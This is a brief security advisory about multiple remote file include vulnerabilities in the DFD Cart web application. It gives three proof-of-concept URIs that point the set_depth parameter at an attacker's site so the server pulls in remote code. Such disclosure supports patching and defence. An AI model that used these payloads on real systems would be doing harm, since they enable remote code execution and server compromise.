|
DFD Cart Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://attacker's site http://www.example.com/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://attacker's site http://www.example.com/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://attacker's site |
|
|
Privacy Statement |
